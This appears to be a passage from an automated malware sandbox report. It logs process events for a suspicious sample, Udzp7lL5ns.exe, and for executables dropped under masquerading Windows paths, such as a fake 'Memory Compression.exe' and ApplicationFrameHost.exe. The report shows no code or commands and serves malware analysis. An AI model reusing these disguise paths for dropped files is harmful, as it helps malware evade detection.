                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
